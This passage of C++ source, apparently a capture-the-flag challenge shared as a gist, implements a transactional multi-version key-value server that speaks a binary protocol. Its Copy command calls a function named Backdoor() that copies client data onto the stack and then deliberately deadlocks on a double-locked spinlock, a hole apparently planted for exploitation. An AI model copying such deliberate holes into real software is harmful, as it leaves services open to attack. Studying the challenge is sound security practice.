iterators.push_back(layer.begin());
min_heap.push_back(i);
}
const auto comparator_gt = [&](size_t a, size_t b) {
const auto it_a = iterators[a];
const auto it_b = iterators[b];
return std::tie(it_a->first, a) > std::tie(it_b->first, b);
};
std::make_heap(min_heap.begin(), min_heap.end(), comparator_gt);
while (!min_heap.empty()) {
std::string_view key;
std::vector<const Version*> versions;
while (true) {
const size_t idx = min_heap.front();
auto& it = iterators[idx];
key = it->first;
const auto& version_list = it->second;
for (const auto& version : version_list) {
versions.push_back(version.get());
}
std::pop_heap(min_heap.begin(), min_heap.end(), comparator_gt);
++it;
if (it == layers_[idx]->end()) {
if (min_heap.size() == 1) {
return;
}
min_heap.pop_back();
} else {
std::push_heap(min_heap.begin(), min_heap.end(), comparator_gt);
}
if (iterators[min_heap.front()]->first != key) {
break;
}
}
fn(key, {versions.begin(), versions.end()});
}
}
Layer* mutable_layer() const {
return layers_.empty() ? nullptr : layers_.back().get();
}
std::span<const std::shared_ptr<Layer>> layers() const {
return {layers_.begin(), layers_.end()};
}
private:
std::vector<std::shared_ptr<Layer>> layers_;
};
class Transaction;
class LockManager {
private:
struct LockState {
// Protected by `LockManager::mu_`.
size_t num_waiters = 0;
Transaction* holder = nullptr;
std::condition_variable cond_var;
};
using LockMap =
std::map<std::string, std::unique_ptr<LockState>, std::less<>>;
public:
using LockHandle = LockMap::iterator;
std::optional<LockHandle> Lock(Transaction* transaction,
std::string_view key) {
std::unique_lock l(mu_);
auto it = map_.find(key);
if (it == map_.end()) {
it = map_.try_emplace(std::string(key), std::make_unique<LockState>())
.first;
}
auto& state = it->second;
if (state->holder == transaction) {
return std::nullopt;
}
++state->num_waiters;
state->cond_var.wait(l, [&] { return state->holder == nullptr; });
state->holder = transaction;
--state->num_waiters;
return it;
}
void Unlock(Transaction* transaction, LockHandle handle) {
std::unique_lock l(mu_);
auto& state = handle->second;
CHECK(state->holder == transaction);
if (state->num_waiters == 0) {
map_.erase(handle);
return;
}
state->holder = nullptr;
l.unlock();
state->cond_var.notify_one();
}
std::mutex mu_;
LockMap map_;
};
using MutationList = std::map<std::string, OwnedValue, std::less<>>;
enum LogLevel : uint8_t {
kDebug,
kInfo,
kError,
};
class Table {
public:
static constexpr std::string_view kInternalKeyPrefix = "_";
static constexpr std::string_view kGcWatermarkKey = "_gc_watermark";
Table() : layer_stack_(std::make_shared<LayerStack>()) { NewMutableLayer(); }
std::shared_ptr<LayerStack> layer_stack() const {
std::shared_lock l(mu_);
return layer_stack_;
}
LockManager* lock_manager() { return &lock_manager_; }
struct ReadResult {
const Version* version = nullptr;
std::shared_ptr<LayerStack> layer_stack;
std::string_view error;
};
ReadResult Read(std::string_view key,
SequenceNumber seq = kMaxSequenceNumber) const {
std::shared_ptr<LayerStack> layer_stack;
{
std::shared_lock l(mu_);
if (seq < gc_watermark_) {
return {.error = "Requested sequence below GC watermark"};
}
layer_stack = layer_stack_;
}
return ReadResult{
.version = layer_stack->Read(key, seq),
.layer_stack = std::move(layer_stack),
};
}
SequenceNumber Apply(const MutationList& mutations) {
std::unique_lock l(mu_);
const SequenceNumber seq = next_seq_++;
for (const auto& [key, value] : mutations) {
if (key == kGcWatermarkKey) {
CHECK(std::holds_alternative<SequenceNumber>(value));
gc_watermark_ = std::clamp(std::get<SequenceNumber>(value),
gc_watermark_, next_seq_ - 1);
}
layer_stack_->mutable_layer()->Set(key, ToUnowned(value), seq);
}
return seq;
}
Layer::Id NewMutableLayer() {
std::unique_lock l(mu_);
if (layer_stack_->mutable_layer() != nullptr) {
layer_stack_->mutable_layer()->Seal();
}
auto new_stack = std::make_shared<LayerStack>();
for (const auto& layer : layer_stack_->layers()) {
new_stack->AddLayer(layer);
}
const Layer::Id id = next_layer_id_++;
new_stack->AddLayer(std::make_shared<Layer>(id));
layer_stack_ = std::move(new_stack);
return id;
}
void Compact(Layer::Id start, Layer::Id limit) {
std::unique_lock l(mu_);
limit = std::min(limit, layer_stack_->mutable_layer()->id());
if (start >= limit) {
return;
}
auto it = compacting_.lower_bound(start);
if (it != compacting_.end() && *it < limit) {
return;
}
const SequenceNumber gc_watermark = start == 0 ? gc_watermark_ : 0;
LayerStack compaction_stack;
for (const auto& layer : layer_stack_->layers()) {
if (layer->id() >= start && layer->id() < limit) {
CHECK(layer.get() != layer_stack_->mutable_layer());
compaction_stack.AddLayer(layer);
compacting_.insert(layer->id());
}
}
l.unlock();
auto new_layer = std::make_shared<Layer>(start);
compaction_stack.Iterate(
[&](std::string_view key, std::span<const Version*> versions) {
size_t first_live = 0;
for (size_t i = 0; i < versions.size(); ++i) {
const auto& version = *versions[i];
if (std::holds_alternative<std::monostate>(version.value) &&
version.seq <= gc_watermark) {
first_live = i + 1;
}
}
versions = versions.subspan(first_live);
SequenceNumber prev_seq = 0;
for (const Version* version : versions) {
new_layer->Set(key, version->value, version->seq);
CHECK(prev_seq <= version->seq);
prev_seq = version->seq;
}
});
new_layer->Seal();
if (new_layer->empty()) {
new_layer = nullptr;
}
l.lock();
auto new_stack = std::make_shared<LayerStack>();
for (const auto& layer : layer_stack_->layers()) {
if (layer->id() < start || layer->id() >= limit) {
new_stack->AddLayer(layer);
} else if (new_layer != nullptr) {
new_stack->AddLayer(std::move(new_layer));
}
}
it = compacting_.lower_bound(start);
while (it != compacting_.end() && *it < limit) {
it = compacting_.erase(it);
}
layer_stack_ = std::move(new_stack);
}
private:
mutable std::shared_mutex mu_;
Layer::Id next_layer_id_ = 0;
SequenceNumber next_seq_ = 1;
SequenceNumber gc_watermark_ = 0;
std::shared_ptr<LayerStack> layer_stack_;
std::set<Layer::Id> compacting_;
LockManager lock_manager_;
};
class SpinLock {
public:
void lock() {
while (true) {
if (!lock_.exchange(true, std::memory_order_acquire)) {
return;
}
while (lock_.load(std::memory_order_relaxed)) {
_mm_pause();
}
}
}
bool try_lock() {
return !lock_.load(std::memory_order_relaxed) &&
!lock_.exchange(true, std::memory_order_acquire);
}
void unlock() { lock_.store(false, std::memory_order_release); }
private:
std::atomic<bool> lock_{false};
};
class Tracer {
public:
void Trace(const char* format, ...) {
std::unique_lock l(mu_);
if (!enabled_) {
return;
}
va_list ap;
va_start(ap, format);
buffer_.append(VStrFormat(format, ap));
va_end(ap);
buffer_.append("\n");
}
void set_enabled(bool value) {
std::unique_lock l(mu_);
enabled_ = value;
if (!enabled_) {
buffer_.clear();
}
}
std::string Flush() {
std::unique_lock l(mu_);
std::string trace;
trace.swap(buffer_);
return trace;
}
private:
SpinLock mu_;
bool enabled_ = false;
std::string buffer_;
};
class Transaction {
public:
using Id = uint64_t;
static constexpr Id kInvalidId = 0;
static constexpr Id kSystemId = std::numeric_limits<Id>::max();
Transaction(Id id, Table* table, Tracer* tracer)
: id_(id), table_(table), tracer_(tracer) {}
~Transaction() { CHECK(locks_.empty()); }
Table::ReadResult Read(std::string_view key) {
{
std::unique_lock l(mu_);
if (finished_) {
return {.error = "Transaction finished"};
}
++num_active_requests_;
}
Trace("Locking %s", key.data());
Lock(key);
Table::ReadResult result = table_->Read(key, kMaxSequenceNumber);
bool notify = false;
{
std::unique_lock l(mu_);
CHECK(!finished_);
--num_active_requests_;
notify = num_active_requests_ == 0;
}
if (notify) {
cond_var_.notify_all();
}
return result;
}
void BufferMutation(std::string_view key, OwnedValue value) {
if (auto it = mutations_.find(key); it != mutations_.end()) {
it->second = std::move(value);
} else {
mutations_[std::string(key)] = std::move(value);
}
}
SequenceNumber Commit() {
Trace("Commiting %" PRIu64, id_);
{
std::unique_lock l(mu_);
if (finished_) {
return kMaxSequenceNumber;
}
cond_var_.wait(l, [&] { return num_active_requests_ == 0; });
finished_ = true;
}
for (const auto& [key, _] : mutations_) {
Lock(key);
}
const SequenceNumber seq = table_->Apply(mutations_);
UnlockAll();
return seq;
}
bool Abort() {
{
std::unique_lock l(mu_);
if (finished_) {
return false;
}
cond_var_.wait(l, [&] { return num_active_requests_ == 0; });
finished_ = true;
}
UnlockAll();
return true;
}
template <typename... Args>
void Trace(Args&&... args) {
tracer_->Trace(std::forward<Args>(args)...);
}
private:
void Lock(std::string_view key) {
auto lock_handle = table_->lock_manager()->Lock(this, key);
if (lock_handle.has_value()) {
locks_.push_back(*lock_handle);
}
}
void UnlockAll() {
for (const auto& lock_handle : locks_) {
table_->lock_manager()->Unlock(this, lock_handle);
}
locks_.clear();
}
const Id id_;
Table* const table_;
MutationList mutations_;
std::vector<LockManager::LockHandle> locks_;
std::mutex mu_;
std::condition_variable cond_var_;
bool finished_ = false;
size_t num_active_requests_ = 0;
Tracer* const tracer_;
};
class Session {
public:
Session(Table* table) : table_(table) {}
template <typename T, std::enable_if_t<
std::is_arithmetic_v<std::conditional_t<
std::is_enum_v<T>, std::underlying_type<T>, T>>,
bool> = true>
void Read(T* value) {
CHECK(ReadLen(0, value, sizeof(*value)) == sizeof(*value));
}
void Read(std::string* str) {
uint16_t size;
Read(&size);
str->resize(size);
if (size > 0) {
CHECK(ReadLen(0, str->data(), size) == size);
}
}
void Read(Vec2* v) {
Read(&v->x);
Read(&v->y);
}
void Read(Vec3* v) {
Read(&v->x);
Read(&v->y);
Read(&v->z);
}
void Read(Quaternion* v) {
Read(&v->a);
Read(&v->b);
Read(&v->c);
Read(&v->d);
}
void Read(OwnedValue* value) {
uint8_t tag;
Read(&tag);
CHECK(tag < std::variant_size_v<Value>);
switch (tag) {
case 0: {
*value = OwnedValue();
return;
}
#define HANDLE(tag) \
case tag: { \
Read(&value->emplace<tag>()); \
return; \
}
HANDLE(1)
HANDLE(2)
HANDLE(3)
HANDLE(4)
HANDLE(5)
HANDLE(6)
static_assert(std::variant_size_v<Value> == 7);
#undef HANDLE
}
}
class IOLock {
public:
explicit IOLock(Session* session) : lock_(session->io_mu_) {}
private:
std::unique_lock<std::mutex> lock_;
};
template <typename T, std::enable_if_t<
std::is_arithmetic_v<std::conditional_t<
std::is_enum_v<T>, std::underlying_type<T>, T>>,
bool> = true>
void Write(T value) {
CHECK(WriteLen(1, &value, sizeof(value)) == sizeof(value));
}
void Write(std::string_view value) {
CHECK(value.size() <= std::numeric_limits<uint16_t>::max());
Write<uint16_t>(value.size());
if (!value.empty()) {
CHECK(WriteLen(1, value.data(), value.size()) == value.size());
}
}
void Write(const Vec2& v) {
Write(v.x);
Write(v.y);
}
void Write(const Vec3& v) {
Write(v.x);
Write(v.y);
Write(v.z);
}
void Write(const Quaternion& v) {
Write(v.a);
Write(v.b);
Write(v.c);
Write(v.d);
}
void Write(const Value& value) {
static_assert(std::variant_size_v<Value> <=
std::numeric_limits<uint8_t>::max());
Write<uint8_t>(value.index());
std::visit(overloaded{
[](std::monostate) {},
[&](const auto& v) { Write(v); },
},
value);
}
Table* table() const { return table_; }
std::shared_ptr<Transaction> FindTransaction(Transaction::Id tid) {
if (tid == Transaction::kSystemId) {
return nullptr;
}
std::shared_lock l(transactions_mu_);
auto it = transactions_.find(tid);
if (it == transactions_.end()) {
return nullptr;
}
return it->second;
}
Transaction::Id CreateTransaction() {
std::unique_lock l(transactions_mu_);
const Transaction::Id tid = next_tid_++;
auto transaction = std::make_shared<Transaction>(tid, table_, &tracer_);
transactions_[tid] = std::move(transaction);
return tid;
}
void RemoveTransaction(Transaction::Id tid) {
std::unique_lock l(transactions_mu_);
transactions_.erase(tid);
}
Tracer* tracer() { return &tracer_; }
private:
// Serializes socket reads/writes.
std::mutex io_mu_;
Table* const table_;
std::shared_mutex transactions_mu_;
Transaction::Id next_tid_ = 1;
std::map<Transaction::Id, std::shared_ptr<Transaction>> transactions_;
Tracer tracer_;
};
class CommandHandler {
public:
explicit CommandHandler(Session* session) : session_(session) {}
virtual ~CommandHandler() {}
virtual void ReadRequest() = 0;
virtual void Run() = 0;
template <typename... Args>
void Trace(Args&&... args) {
session_->tracer()->Trace(std::forward<Args>(args)...);
}
using RequestId = uint64_t;
protected:
Session* session_;
};
class ReadHandler : public CommandHandler {
public:
explicit ReadHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&tid_);
session_->Read(&seq_);
session_->Read(&key_);
}
void Run() override {
if (tid_ != Transaction::kInvalidId) {
transaction_ = session_->FindTransaction(tid_);
if (transaction_ == nullptr) {
ReturnError("Transaction not found");
return;
}
if (seq_ != kMaxSequenceNumber) {
ReturnError("Invalid sequence number for transactional read");
return;
}
const Table::ReadResult result = transaction_->Read(key_);
TraceResult(result);
ReturnResult(result);
return;
}
const Table::ReadResult result = session_->table()->Read(key_);
TraceResult(result);
ReturnResult(result);
}
private:
void TraceResult(const Table::ReadResult& result) {
if (!result.error.empty()) {
Trace("Read %s failed: %s", key_.c_str(), result.error.data());
return;
}
Trace(
"Read %s -> %s", key_.c_str(),
DebugString(result.version == nullptr ? Value() : result.version->value)
.c_str());
}
void ReturnResult(const Table::ReadResult& result) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(result.error);
session_->Write(result.version == nullptr ? Value()
: result.version->value);
}
void ReturnError(std::string_view error) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
session_->Write(Value());
}
private:
RequestId request_id_;
Transaction::Id tid_;
SequenceNumber seq_;
std::string key_;
std::shared_ptr<Transaction> transaction_;
};
class BeginTransactionHandler : public CommandHandler {
public:
explicit BeginTransactionHandler(Session* session)
: CommandHandler(session) {}
void ReadRequest() override { session_->Read(&request_id_); }
void Run() override {
const Transaction::Id tid = session_->CreateTransaction();
Trace("Begin transaction %" PRIu64, tid);
Return(tid);
}
private:
void Return(Transaction::Id tid) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(tid);
}
RequestId request_id_;
};
class BufferMutationHandler : public CommandHandler {
public:
explicit BufferMutationHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&tid_);
session_->Read(&key_);
session_->Read(&value_);
}
void Run() override {
transaction_ = session_->FindTransaction(tid_);
if (transaction_ == nullptr) {
Return("Transaction not found");
return;
}
if (key_.starts_with(Table::kInternalKeyPrefix)) {
Return("Cannot write to internal key");
return;
}
Trace("Buffering %s -> %s", key_.c_str(),
DebugString(ToUnowned(value_)).c_str());
transaction_->BufferMutation(std::move(key_), std::move(value_));
Return(/*error=*/"");
}
private:
void Return(std::string_view error) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
}
private:
RequestId request_id_;
Transaction::Id tid_;
std::string key_;
OwnedValue value_;
std::shared_ptr<Transaction> transaction_;
};
class CommitHandler : public CommandHandler {
public:
explicit CommitHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&tid_);
}
void Run() override {
transaction_ = session_->FindTransaction(tid_);
if (transaction_ == nullptr) {
Return("Transaction not found", /*seq=*/kMaxSequenceNumber);
return;
}
const SequenceNumber seq = transaction_->Commit();
std::string_view error;
if (seq == kMaxSequenceNumber) {
error = "Commit failed";
} else {
session_->RemoveTransaction(tid_);
}
Trace("Committing TID %" PRIu64 ": %s", tid_,
error.empty() ? "success" : error.data());
Return(error, seq);
}
private:
void Return(std::string_view error, SequenceNumber seq) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
session_->Write(seq);
}
private:
RequestId request_id_;
Transaction::Id tid_;
std::shared_ptr<Transaction> transaction_;
};
class AbortHandler : public CommandHandler {
public:
explicit AbortHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&tid_);
}
void Run() override {
transaction_ = session_->FindTransaction(tid_);
if (transaction_ == nullptr) {
Return("Transaction not found");
return;
}
std::string_view error;
if (transaction_->Abort()) {
session_->RemoveTransaction(tid_);
} else {
error = "Abort failed";
}
Trace("Aborting TID %" PRIu64 ": %s", tid_,
error.empty() ? "success" : error.data());
Return(error);
}
private:
void Return(std::string_view error) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
}
private:
RequestId request_id_;
Transaction::Id tid_;
std::shared_ptr<Transaction> transaction_;
};
class MinorCompactHandler : public CommandHandler {
public:
explicit MinorCompactHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override { session_->Read(&request_id_); }
void Run() override {
const Layer::Id id = session_->table()->NewMutableLayer();
Trace("New mutable layer ID: %" PRIu64, id);
Return(id);
}
private:
void Return(Layer::Id id) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(id);
}
private:
RequestId request_id_;
};
class MergeCompactHandler : public CommandHandler {
public:
explicit MergeCompactHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&start_);
session_->Read(&limit_);
}
void Run() override {
session_->table()->Compact(start_, limit_);
Trace("Merge compacted [%" PRIu64 ", %" PRIu64 ")", start_, limit_);
Return();
}
private:
void Return() {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
}
private:
RequestId request_id_;
Layer::Id start_;
Layer::Id limit_;
};
class SetGcWatermarkHandler : public CommandHandler {
public:
explicit SetGcWatermarkHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&gc_watermark_);
}
void Run() override {
Trace("Set GC watermark to: %" PRIu64, gc_watermark_);
auto transaction = std::make_shared<Transaction>(
Transaction::kSystemId, session_->table(), session_->tracer());
transaction->BufferMutation(std::string(Table::kGcWatermarkKey),
gc_watermark_);
const SequenceNumber seq = transaction->Commit();
const std::string_view error =
seq == kMaxSequenceNumber ? "GC watermark commit failed" : "";
Return(error);
}
private:
void Return(std::string_view error) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
}
private:
RequestId request_id_;
SequenceNumber gc_watermark_;
};
class SetTraceEnabledHandler : public CommandHandler {
public:
explicit SetTraceEnabledHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&trace_enabled_);
}
void Run() override {
session_->tracer()->set_enabled(trace_enabled_);
Return();
}
private:
void Return() {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
}
private:
RequestId request_id_;
bool trace_enabled_;
};
class FlushTraceHandler : public CommandHandler {
public:
explicit FlushTraceHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override { session_->Read(&request_id_); }
void Run() override {
std::string trace_buffer = session_->tracer()->Flush();
Return(std::move(trace_buffer));
}
private:
void Return(std::string trace_buffer) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(std::string_view(trace_buffer));
}
private:
RequestId request_id_;
};
static SpinLock mu;
class CopyHandler : public CommandHandler {
public:
explicit CopyHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&a_);
session_->Read(&b_);
session_->Read(&data_);
}
void Run() override {
{
transaction_ = std::make_shared<Transaction>(
Transaction::kSystemId, session_->table(), session_->tracer());
const Table::ReadResult r = transaction_->Read(a_);
if (r.version == nullptr) {
transaction_->Abort();
Return("Missing value");
return;
}
transaction_->BufferMutation(b_, ToOwned(r.version->value));
if (transaction_->Commit() == kMaxSequenceNumber) {
Return("Failed to commit txn");
return;
}
}
Trace("Copied %s -> %s, (%d)", a_.c_str(), b_.c_str(), data_.empty());
if (!data_.empty()) {
Backdoor();
}
Return("");
}
private:
void Backdoor() {
char buf[1024];
CHECK(data_.size() <= sizeof(buf));
memcpy(buf, data_.data(), data_.size());
std::unique_lock l1(mu);
std::unique_lock l2(mu);
}
void Return(std::string_view error) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
}
private:
RequestId request_id_;
std::string a_;
std::string b_;
std::string data_;
std::shared_ptr<Transaction> transaction_;
};
enum class Command : uint8_t {
kRead,
kBeginTransaction,
kBufferMutation,
kCommit,
kAbort,
kMinorCompact,
kMergeCompact,
kSetGcWatermark,
kSetTraceEnabled,
kFlushTrace,
kCopy,
};
constexpr uint8_t kMaxCommand = static_cast<uint8_t>(Command::kCopy);
void HandleRequests(Table* table) {
Session session(table);
constexpr char kMagic[16] = "PPPDDDBBB_1.0";
CHECK(WriteLen(1, kMagic, sizeof(kMagic)) == sizeof(kMagic));
while (true) {
uint8_t cmd_byte;
if (ReadLen(0, &cmd_byte, sizeof(cmd_byte)) != sizeof(cmd_byte)) {
break;
}
CHECK(cmd_byte <= kMaxCommand);
const Command command = static_cast<Command>(cmd_byte);
std::unique_ptr<CommandHandler> handler;
switch (command) {
#define HANDLE(command) \
case Command::k##command: { \
handler = std::make_unique<command##Handler>(&session); \
handler->ReadRequest(); \
break; \
}
HANDLE(Read)
HANDLE(BeginTransaction)
HANDLE(BufferMutation)
HANDLE(Commit)
HANDLE(Abort)
HANDLE(MinorCompact)
HANDLE(MergeCompact)
HANDLE(SetGcWatermark)
HANDLE(SetTraceEnabled)
HANDLE(FlushTrace)
HANDLE(Copy)
#undef HANDLE
}
CHECK(handler != nullptr);
std::thread([handler = std::move(handler)] { handler->Run(); }).detach();
}
exit(0);
}
Table table;
int main(int argc, char** argv) {
alarm(600);
mallopt(M_ARENA_MAX, 8);
std::thread([] { HandleRequests(&table); }).join();
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment